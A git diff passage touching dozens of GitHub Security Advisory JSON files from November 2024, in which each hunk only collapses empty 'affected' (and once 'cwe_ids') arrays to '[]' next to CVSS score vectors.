e545b464af1..d47cd5b5a57 100644 --- a/advisories/unreviewed/2024/11/GHSA-7ch8-mh59-262m/GHSA-7ch8-mh59-262m.json +++ b/advisories/unreviewed/2024/11/GHSA-7ch8-mh59-262m/GHSA-7ch8-mh59-262m.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-7h5p-3h8w-5629/GHSA-7h5p-3h8w-5629.json b/advisories/unreviewed/2024/11/GHSA-7h5p-3h8w-5629/GHSA-7h5p-3h8w-5629.json index b58f498a7ed..96d2fc06210 100644 --- a/advisories/unreviewed/2024/11/GHSA-7h5p-3h8w-5629/GHSA-7h5p-3h8w-5629.json +++ b/advisories/unreviewed/2024/11/GHSA-7h5p-3h8w-5629/GHSA-7h5p-3h8w-5629.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-7j4g-m9q4-562g/GHSA-7j4g-m9q4-562g.json b/advisories/unreviewed/2024/11/GHSA-7j4g-m9q4-562g/GHSA-7j4g-m9q4-562g.json index bc6ee81a8a2..d8df65e4a2a 100644 --- a/advisories/unreviewed/2024/11/GHSA-7j4g-m9q4-562g/GHSA-7j4g-m9q4-562g.json +++ b/advisories/unreviewed/2024/11/GHSA-7j4g-m9q4-562g/GHSA-7j4g-m9q4-562g.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-7mqq-22j6-frjr/GHSA-7mqq-22j6-frjr.json b/advisories/unreviewed/2024/11/GHSA-7mqq-22j6-frjr/GHSA-7mqq-22j6-frjr.json index 63e6963445e..30e09fcd007 100644 --- a/advisories/unreviewed/2024/11/GHSA-7mqq-22j6-frjr/GHSA-7mqq-22j6-frjr.json +++ b/advisories/unreviewed/2024/11/GHSA-7mqq-22j6-frjr/GHSA-7mqq-22j6-frjr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-7pmr-m2q5-rp82/GHSA-7pmr-m2q5-rp82.json b/advisories/unreviewed/2024/11/GHSA-7pmr-m2q5-rp82/GHSA-7pmr-m2q5-rp82.json index 374de34b84e..9e4d58167ea 100644 --- a/advisories/unreviewed/2024/11/GHSA-7pmr-m2q5-rp82/GHSA-7pmr-m2q5-rp82.json +++ b/advisories/unreviewed/2024/11/GHSA-7pmr-m2q5-rp82/GHSA-7pmr-m2q5-rp82.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-7r42-p46c-33g2/GHSA-7r42-p46c-33g2.json b/advisories/unreviewed/2024/11/GHSA-7r42-p46c-33g2/GHSA-7r42-p46c-33g2.json index 68a4d7f215d..517a844ceff 100644 --- a/advisories/unreviewed/2024/11/GHSA-7r42-p46c-33g2/GHSA-7r42-p46c-33g2.json +++ b/advisories/unreviewed/2024/11/GHSA-7r42-p46c-33g2/GHSA-7r42-p46c-33g2.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:H/VA:L/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-84q2-584c-m4v4/GHSA-84q2-584c-m4v4.json b/advisories/unreviewed/2024/11/GHSA-84q2-584c-m4v4/GHSA-84q2-584c-m4v4.json index 7bc8d7eb15e..cd3c1f81387 100644 --- a/advisories/unreviewed/2024/11/GHSA-84q2-584c-m4v4/GHSA-84q2-584c-m4v4.json +++ b/advisories/unreviewed/2024/11/GHSA-84q2-584c-m4v4/GHSA-84q2-584c-m4v4.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-8755-h2rp-p3rr/GHSA-8755-h2rp-p3rr.json b/advisories/unreviewed/2024/11/GHSA-8755-h2rp-p3rr/GHSA-8755-h2rp-p3rr.json index d5f56615eef..7ccdb811a12 100644 --- a/advisories/unreviewed/2024/11/GHSA-8755-h2rp-p3rr/GHSA-8755-h2rp-p3rr.json +++ b/advisories/unreviewed/2024/11/GHSA-8755-h2rp-p3rr/GHSA-8755-h2rp-p3rr.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-877x-7xf2-qfc6/GHSA-877x-7xf2-qfc6.json b/advisories/unreviewed/2024/11/GHSA-877x-7xf2-qfc6/GHSA-877x-7xf2-qfc6.json index 77c28ce2e62..b9ebc7c89e6 100644 --- a/advisories/unreviewed/2024/11/GHSA-877x-7xf2-qfc6/GHSA-877x-7xf2-qfc6.json +++ b/advisories/unreviewed/2024/11/GHSA-877x-7xf2-qfc6/GHSA-877x-7xf2-qfc6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-87c6-34x6-8wvx/GHSA-87c6-34x6-8wvx.json b/advisories/unreviewed/2024/11/GHSA-87c6-34x6-8wvx/GHSA-87c6-34x6-8wvx.json index 666878c2241..dbdb97d544b 100644 --- a/advisories/unreviewed/2024/11/GHSA-87c6-34x6-8wvx/GHSA-87c6-34x6-8wvx.json +++ b/advisories/unreviewed/2024/11/GHSA-87c6-34x6-8wvx/GHSA-87c6-34x6-8wvx.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-88g2-9h8q-q752/GHSA-88g2-9h8q-q752.json b/advisories/unreviewed/2024/11/GHSA-88g2-9h8q-q752/GHSA-88g2-9h8q-q752.json index cbd731f2de7..63a0e003c3d 100644 --- a/advisories/unreviewed/2024/11/GHSA-88g2-9h8q-q752/GHSA-88g2-9h8q-q752.json +++ b/advisories/unreviewed/2024/11/GHSA-88g2-9h8q-q752/GHSA-88g2-9h8q-q752.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-88gp-ph45-wpx4/GHSA-88gp-ph45-wpx4.json b/advisories/unreviewed/2024/11/GHSA-88gp-ph45-wpx4/GHSA-88gp-ph45-wpx4.json index 7cdc6ee1236..83942724267 100644 --- a/advisories/unreviewed/2024/11/GHSA-88gp-ph45-wpx4/GHSA-88gp-ph45-wpx4.json +++ b/advisories/unreviewed/2024/11/GHSA-88gp-ph45-wpx4/GHSA-88gp-ph45-wpx4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-8cgv-6qhm-jgp2/GHSA-8cgv-6qhm-jgp2.json b/advisories/unreviewed/2024/11/GHSA-8cgv-6qhm-jgp2/GHSA-8cgv-6qhm-jgp2.json index 7c1ecffcac0..e6c0bd8af7d 100644 --- a/advisories/unreviewed/2024/11/GHSA-8cgv-6qhm-jgp2/GHSA-8cgv-6qhm-jgp2.json +++ b/advisories/unreviewed/2024/11/GHSA-8cgv-6qhm-jgp2/GHSA-8cgv-6qhm-jgp2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-8fc3-6g2g-rgc3/GHSA-8fc3-6g2g-rgc3.json b/advisories/unreviewed/2024/11/GHSA-8fc3-6g2g-rgc3/GHSA-8fc3-6g2g-rgc3.json index b4b6b3862ae..2fee40a1e4a 100644 --- a/advisories/unreviewed/2024/11/GHSA-8fc3-6g2g-rgc3/GHSA-8fc3-6g2g-rgc3.json +++ b/advisories/unreviewed/2024/11/GHSA-8fc3-6g2g-rgc3/GHSA-8fc3-6g2g-rgc3.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-8g5x-cxhr-gr43/GHSA-8g5x-cxhr-gr43.json b/advisories/unreviewed/2024/11/GHSA-8g5x-cxhr-gr43/GHSA-8g5x-cxhr-gr43.json index abc1bffc655..a6799dbd5ee 100644 --- a/advisories/unreviewed/2024/11/GHSA-8g5x-cxhr-gr43/GHSA-8g5x-cxhr-gr43.json +++ b/advisories/unreviewed/2024/11/GHSA-8g5x-cxhr-gr43/GHSA-8g5x-cxhr-gr43.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-8gv7-mmch-w6h8/GHSA-8gv7-mmch-w6h8.json b/advisories/unreviewed/2024/11/GHSA-8gv7-mmch-w6h8/GHSA-8gv7-mmch-w6h8.json index 4e151cd7fae..f158d9e5b34 100644 --- a/advisories/unreviewed/2024/11/GHSA-8gv7-mmch-w6h8/GHSA-8gv7-mmch-w6h8.json +++ b/advisories/unreviewed/2024/11/GHSA-8gv7-mmch-w6h8/GHSA-8gv7-mmch-w6h8.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-8m6r-7r42-49x3/GHSA-8m6r-7r42-49x3.json b/advisories/unreviewed/2024/11/GHSA-8m6r-7r42-49x3/GHSA-8m6r-7r42-49x3.json index 330ad4824a1..5f7f5674624 100644 --- a/advisories/unreviewed/2024/11/GHSA-8m6r-7r42-49x3/GHSA-8m6r-7r42-49x3.json +++ b/advisories/unreviewed/2024/11/GHSA-8m6r-7r42-49x3/GHSA-8m6r-7r42-49x3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-8r37-8jq6-q9m7/GHSA-8r37-8jq6-q9m7.json b/advisories/unreviewed/2024/11/GHSA-8r37-8jq6-q9m7/GHSA-8r37-8jq6-q9m7.json index 7869f83a3b3..e58b8cf0917 100644 --- a/advisories/unreviewed/2024/11/GHSA-8r37-8jq6-q9m7/GHSA-8r37-8jq6-q9m7.json +++ b/advisories/unreviewed/2024/11/GHSA-8r37-8jq6-q9m7/GHSA-8r37-8jq6-q9m7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-8xqq-wrhg-93q9/GHSA-8xqq-wrhg-93q9.json b/advisories/unreviewed/2024/11/GHSA-8xqq-wrhg-93q9/GHSA-8xqq-wrhg-93q9.json index e69883ca7bb..e56305ce3a6 100644 --- a/advisories/unreviewed/2024/11/GHSA-8xqq-wrhg-93q9/GHSA-8xqq-wrhg-93q9.json +++ b/advisories/unreviewed/2024/11/GHSA-8xqq-wrhg-93q9/GHSA-8xqq-wrhg-93q9.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-943v-4mfm-9hjg/GHSA-943v-4mfm-9hjg.json b/advisories/unreviewed/2024/11/GHSA-943v-4mfm-9hjg/GHSA-943v-4mfm-9hjg.json index 4b3bb2e6d3a..0c38a56e5be 100644 --- a/advisories/unreviewed/2024/11/GHSA-943v-4mfm-9hjg/GHSA-943v-4mfm-9hjg.json +++ b/advisories/unreviewed/2024/11/GHSA-943v-4mfm-9hjg/GHSA-943v-4mfm-9hjg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-947h-mmrh-w9vx/GHSA-947h-mmrh-w9vx.json b/advisories/unreviewed/2024/11/GHSA-947h-mmrh-w9vx/GHSA-947h-mmrh-w9vx.json index 4a5a39b4693..e9c05c01397 100644 --- a/advisories/unreviewed/2024/11/GHSA-947h-mmrh-w9vx/GHSA-947h-mmrh-w9vx.json +++ b/advisories/unreviewed/2024/11/GHSA-947h-mmrh-w9vx/GHSA-947h-mmrh-w9vx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-952m-vgvv-fj9g/GHSA-952m-vgvv-fj9g.json b/advisories/unreviewed/2024/11/GHSA-952m-vgvv-fj9g/GHSA-952m-vgvv-fj9g.json index a1751b58f6e..caebc41abe1 100644 --- a/advisories/unreviewed/2024/11/GHSA-952m-vgvv-fj9g/GHSA-952m-vgvv-fj9g.json +++ b/advisories/unreviewed/2024/11/GHSA-952m-vgvv-fj9g/GHSA-952m-vgvv-fj9g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-98p8-4mpf-g28q/GHSA-98p8-4mpf-g28q.json b/advisories/unreviewed/2024/11/GHSA-98p8-4mpf-g28q/GHSA-98p8-4mpf-g28q.json index 0a607b04375..868d3821d17 100644 --- a/advisories/unreviewed/2024/11/GHSA-98p8-4mpf-g28q/GHSA-98p8-4mpf-g28q.json +++ b/advisories/unreviewed/2024/11/GHSA-98p8-4mpf-g28q/GHSA-98p8-4mpf-g28q.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-9g9p-59w9-vqqc/GHSA-9g9p-59w9-vqqc.json b/advisories/unreviewed/2024/11/GHSA-9g9p-59w9-vqqc/GHSA-9g9p-59w9-vqqc.json index 57a13f43044..cdecd63091e 100644 --- a/advisories/unreviewed/2024/11/GHSA-9g9p-59w9-vqqc/GHSA-9g9p-59w9-vqqc.json +++ b/advisories/unreviewed/2024/11/GHSA-9g9p-59w9-vqqc/GHSA-9g9p-59w9-vqqc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-9hqp-3p4c-742r/GHSA-9hqp-3p4c-742r.json b/advisories/unreviewed/2024/11/GHSA-9hqp-3p4c-742r/GHSA-9hqp-3p4c-742r.json index cd661e52427..d38b6aba1e4 100644 --- a/advisories/unreviewed/2024/11/GHSA-9hqp-3p4c-742r/GHSA-9hqp-3p4c-742r.json +++ b/advisories/unreviewed/2024/11/GHSA-9hqp-3p4c-742r/GHSA-9hqp-3p4c-742r.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-9pjf-rrr2-qjqf/GHSA-9pjf-rrr2-qjqf.json b/advisories/unreviewed/2024/11/GHSA-9pjf-rrr2-qjqf/GHSA-9pjf-rrr2-qjqf.json index f1a7f2c3459..bdd38d1fd58 100644 --- a/advisories/unreviewed/2024/11/GHSA-9pjf-rrr2-qjqf/GHSA-9pjf-rrr2-qjqf.json +++ b/advisories/unreviewed/2024/11/GHSA-9pjf-rrr2-qjqf/GHSA-9pjf-rrr2-qjqf.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-9r4q-j4q6-fv33/GHSA-9r4q-j4q6-fv33.json b/advisories/unreviewed/2024/11/GHSA-9r4q-j4q6-fv33/GHSA-9r4q-j4q6-fv33.json index 981ac081f5e..860c7a7a965 100644 --- a/advisories/unreviewed/2024/11/GHSA-9r4q-j4q6-fv33/GHSA-9r4q-j4q6-fv33.json +++ b/advisories/unreviewed/2024/11/GHSA-9r4q-j4q6-fv33/GHSA-9r4q-j4q6-fv33.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-9wrc-jcvc-7hxx/GHSA-9wrc-jcvc-7hxx.json b/advisories/unreviewed/2024/11/GHSA-9wrc-jcvc-7hxx/GHSA-9wrc-jcvc-7hxx.json index cce22996ae5..ae4577d9d02 100644 --- a/advisories/unreviewed/2024/11/GHSA-9wrc-jcvc-7hxx/GHSA-9wrc-jcvc-7hxx.json +++ b/advisories/unreviewed/2024/11/GHSA-9wrc-jcvc-7hxx/GHSA-9wrc-jcvc-7hxx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-c2hx-5fr9-qf89/GHSA-c2hx-5fr9-qf89.json b/advisories/unreviewed/2024/11/GHSA-c2hx-5fr9-qf89/GHSA-c2hx-5fr9-qf89.json index 213dcf63f9e..f430f024892 100644 --- a/advisories/unreviewed/2024/11/GHSA-c2hx-5fr9-qf89/GHSA-c2hx-5fr9-qf89.json +++ b/advisories/unreviewed/2024/11/GHSA-c2hx-5fr9-qf89/GHSA-c2hx-5fr9-qf89.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-c2rv-8j84-953p/GHSA-c2rv-8j84-953p.json b/advisories/unreviewed/2024/11/GHSA-c2rv-8j84-953p/GHSA-c2rv-8j84-953p.json index 7a879f51eb7..550addc691f 100644 --- a/advisories/unreviewed/2024/11/GHSA-c2rv-8j84-953p/GHSA-c2rv-8j84-953p.json +++ b/advisories/unreviewed/2024/11/GHSA-c2rv-8j84-953p/GHSA-c2rv-8j84-953p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-c62c-xc8v-3q5x/GHSA-c62c-xc8v-3q5x.json b/advisories/unreviewed/2024/11/GHSA-c62c-xc8v-3q5x/GHSA-c62c-xc8v-3q5x.json index 69a00a5cc6f..a0eb348a287 100644 --- a/advisories/unreviewed/2024/11/GHSA-c62c-xc8v-3q5x/GHSA-c62c-xc8v-3q5x.json +++ b/advisories/unreviewed/2024/11/GHSA-c62c-xc8v-3q5x/GHSA-c62c-xc8v-3q5x.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-c665-gh2m-5vg4/GHSA-c665-gh2m-5vg4.json b/advisories/unreviewed/2024/11/GHSA-c665-gh2m-5vg4/GHSA-c665-gh2m-5vg4.json index 31df557b71d..7e9198be92b 100644 --- a/advisories/unreviewed/2024/11/GHSA-c665-gh2m-5vg4/GHSA-c665-gh2m-5vg4.json +++ b/advisories/unreviewed/2024/11/GHSA-c665-gh2m-5vg4/GHSA-c665-gh2m-5vg4.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-c7c7-8vw9-wpp6/GHSA-c7c7-8vw9-wpp6.json b/advisories/unreviewed/2024/11/GHSA-c7c7-8vw9-wpp6/GHSA-c7c7-8vw9-wpp6.json index 8a8a5c6e4bb..0d6cb26cba4 100644 --- a/advisories/unreviewed/2024/11/GHSA-c7c7-8vw9-wpp6/GHSA-c7c7-8vw9-wpp6.json +++ b/advisories/unreviewed/2024/11/GHSA-c7c7-8vw9-wpp6/GHSA-c7c7-8vw9-wpp6.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-chgm-fm3p-h36c/GHSA-chgm-fm3p-h36c.json b/advisories/unreviewed/2024/11/GHSA-chgm-fm3p-h36c/GHSA-chgm-fm3p-h36c.json index adf50789a86..6c032af2215 100644 --- a/advisories/unreviewed/2024/11/GHSA-chgm-fm3p-h36c/GHSA-chgm-fm3p-h36c.json +++ b/advisories/unreviewed/2024/11/GHSA-chgm-fm3p-h36c/GHSA-chgm-fm3p-h36c.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-cjq9-chqc-g9rx/GHSA-cjq9-chqc-g9rx.json b/advisories/unreviewed/2024/11/GHSA-cjq9-chqc-g9rx/GHSA-cjq9-chqc-g9rx.json index 5cecde04669..fc3cee6ab93 100644 --- a/advisories/unreviewed/2024/11/GHSA-cjq9-chqc-g9rx/GHSA-cjq9-chqc-g9rx.json +++ b/advisories/unreviewed/2024/11/GHSA-cjq9-chqc-g9rx/GHSA-cjq9-chqc-g9rx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-cmvg-6592-4mfp/GHSA-cmvg-6592-4mfp.json b/advisories/unreviewed/2024/11/GHSA-cmvg-6592-4mfp/GHSA-cmvg-6592-4mfp.json index 36b1e20ca25..7800b74f12d 100644 --- a/advisories/unreviewed/2024/11/GHSA-cmvg-6592-4mfp/GHSA-cmvg-6592-4mfp.json +++ b/advisories/unreviewed/2024/11/GHSA-cmvg-6592-4mfp/GHSA-cmvg-6592-4mfp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-cpmw-ff7x-cg2w/GHSA-cpmw-ff7x-cg2w.json 